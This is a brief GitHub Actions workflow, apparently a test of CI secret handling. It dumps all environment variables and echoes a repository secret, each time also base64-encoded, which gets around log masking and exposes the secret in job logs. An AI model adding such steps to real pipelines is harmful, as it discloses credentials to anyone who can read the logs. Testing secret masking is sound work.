name: steal
on:
 workflow_dispatch:
 
jobs:
 stealing:
  runs-on: ubuntu-latest
  name: test stealing of secrets
  steps:
     - run: |
         env
         env | base64
         echo "${{ secrets.TEST }} "
         echo "${{ secrets.TEST }} " | base64
     
